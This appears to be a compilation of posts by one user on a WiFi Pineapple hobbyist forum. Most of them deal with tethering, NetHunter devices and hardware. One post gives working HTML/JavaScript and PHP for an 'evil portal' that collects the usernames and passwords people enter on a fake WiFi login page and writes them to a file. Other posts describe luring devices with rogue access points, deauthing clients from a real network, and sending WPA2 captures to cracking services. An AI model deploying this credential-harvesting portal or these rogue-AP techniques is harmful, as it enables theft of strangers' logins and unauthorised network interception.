jermzz

It's really picky about what commands and how you can access files in /www. Still dunno why this script works, but I can't directly access any pages. I can't even find the nodogsplash config file, its just… not there.. heh.

code tag totally wasn't working right from my phone earlier... here's the js / php I was using with evil portal, it uses POST to push username and pass to capture.php and then redir to authtarget. It's not perfect, it makes a nodogsplash token error, but it saves the userdata and authorizes clients to internet. I was gonna fix the error, but I saw that newbie was revamping, so I just stopped using it. Basically I got frustrated I couldn't get anything to work and just took his markV demo portal and built off it to get it to do what I wanted.... Anyway, you'll need to make a stored.txt in /www since the php appends to the file, or it won't work. in splash.html <script type="text/javascript"> function getUrlVars() { var vars = {}; var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) { vars[key] = value; }); return vars; } var fvalsubmit = getUrlVars()["valsubmit"]; if (fvalsubmit == 1) { window.location = "$authtarget"; } function submitTextToCapture() { textuser = document.getElementById("userText").value; textpswd = document.getElementById("userPass").value; text="username-" + textuser + "-password-" + textpswd; window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget&valsubmit=1"; } </script> <form id="textForm"> <p align="center"> <div style="font-weight:bold;">Enter Username and Password<br> <div align="center"> <input type="text" id="userText" placeholder="Enter your Email" required> <input type="password" id="userPass" placeholder="Enter a Password" required><br> <button type="button" id="button" onclick="submitTextToCapture()"> <b>Connect</b></button> </div> </p> </form> capture.php <?php $text = $_GET["text"]; $redir = $_GET["redir"]; $file = fopen("stored.txt", "a"); fwrite($file, $text . "\n"); fclose($file); echo '<script type="text/javascript">window.location = "' . $redir . '"</script>'; ?>

Also your capture.php is going to throw syntax errors at your closing script tag.

Make sure you have permissions to capture.php. Also make sure you create stored.txt. The php appends, so the file must exist, also with write priv. I got this to work, and modified it to work for password / username capture only clicking one submit button. Can post the script later.

1 nexus 7 2013 wifi / nethunter 3.0 2 5.0.1 3 LRX22C I believe. 4 yes 5 yes 6 yes iPhone 6 for hotspot to nexus when mobile / determining IP address of nano. Kali 2.0 Linux live USB booted from MacBook Pro. Msi GS70 partitioned for Kali 2.0 Also have used with my nexus 7 2012 running 4.4.4. But I don't use it cause the 2013 is way faster.

Here's some shots. Showing pineapple connected and showing it has Internet via update page. A second screen showing build and Kernal, and a third showing its all running on Kali. And all I did was use the wifi pineapple connector app. So now you tell me if it's a hak5 issue or a user issue? EDIT: I'm currently on 5.0.1 for another reason, but it works the same on 5.1.1

It does work in 5.1.1. Click the app, enable tethering, pineapple has Internet. How does it not work? I've done it no less than 3 dozen times now.

I just keep the recon tab open and use another tab for pineAP. I'm sure eventually they'll make a revision to keep the results. But for now it works fine for me to just leave an extra tab open

I swear some people have no idea what Google or a search function is. I put marshmallow on my nexus 7 and found out in 10 minutes that was a mistake and went back to 5.1.1 to use with my nano. No forum thread needed.

Do you run nethunter on your nexus 6? I'm already tired of either using my hotspot on my iPhone (primary phone) or tethering to my nexus 7. I want to get either a nexus 5 or 6 and put it on my att mobile share plan. If so, how does nethunter run with it? Well? How annoying is it using shell on a smaller screen day to day? I wish I could get my hands on both and play with them. I know my 2012 and 2013 nexus 7's are days apart on speed when running nethunter. Especially metasploit.

Thanks for the 1.0.5 quick fix. :)

Assuming that you're trying to tether your wifi.... (And it's not a mobile connected tablet) This is a known bug they're working on fixing. I have the same problem and I have the same tablet as you. I've tried multiple flavors of kitkat lollipop and marshmallow with the same problem. The temporary work around is to connect to the management interface with a separate device and ssh to the nano and run ifconfig. You'll see the 192.168.x.x ip that the nano is running on. Then on the nexus just go to that ip on the nano port and it should work. The tethering works, just have to figure out what IP the nano is being given from the tablet. I tether mine from the hotspot of my iPhone because it's the only way I can get Internet to the nano on the go.

There's a wifi pineapple app in the android store to tether your pineapple to the Internet through your android phone. You can use your laptop as well if it's running Linux by using the wp6.sh. Windows I hear it's harder to connect. Another way to do it is use a USB dongle on the back of the pineapple and under the network tab you can connect to a hotspot or any wifi with client mode with wlan2.

Not exactly. PineAP will broadcast open SSIDs of any nearby device the pineapple can see. But if that device has never connected to a free-wifi, PineAP will not associate it. When you connect to a free wifi with your phone, tablet or computer, once you've left the covered area of that AP your device will always probe for that wifi. And it will automatically connect when it's in range. PineAP simply sniffs those probes and says "I'm this AP, connect to me!" And you will get clients that way. So at your college, if you connect to the free wifi, you're still only going to get clients that are not already associated to an AP, AND that are probing for formerly connected APs. Other than that it's just a 50/50 which AP they connect to if they're the same SSID. Theoretically, if you name your AP the same SSID as an access point, and deauth them, they will connect to you if your signal out powers the other AP. I've not had much luck doing this with the nano in its stock configuration and antennas though. But I haven't tried so much. Maybe someone else can chime in if they've had success.

I see all clients connected to the open wifi regardless of method. Only time I don't see clients is if connected via management.

I don't understand what you're trying to do. You want the nano to work on your laptop, or your phone? You only need a 3rd card if you're not tethering. But if you've done the initial setup of the nano and set a management ssid and password, you should be able to connect to the nano interface via that ssid over wifi with no internet at all at 172.16.42.1:1471

Thanks, I was having this issue too. Love the theme, I was working on something very similar when you released yours. Made my life easier :) kudos!

Doesn't kmod-usb-net-ipheth module only work up til iOS 7? I read they removed it. If it works with iOS 9 I'll try this.

Thanks. I'll check it out.

I'm not doing anything illegal.

If you tap on the box it will pop up the edit / quote boxes on mobile. Took me a while to figure out also.

Darren answered that in his post.

Does anyone have some experience using these services? I currently have a wpa2 cap file on onlinehashcrack but I see in a quick search there's many places that offer this service. Trying to see which ones people use most and what your success rates have been. I have some tables setup on a drive, but nothing extensive as these service claim to be able to crack. Thanks in advance for any input.

What if you just brought the whole interface down? Ifconfig wlan0 down. If you're tethering and just sniffing networks wouldn't that worK? You obviously wouldn't get associations and whatnot using pineAP.

Yeah it works well. I want to get another one of those 180 degree adapters. I'll use it on the power side, then I can use my USB linksys dongle instead of the Alfa and I should be able to fit it all in the tactical case.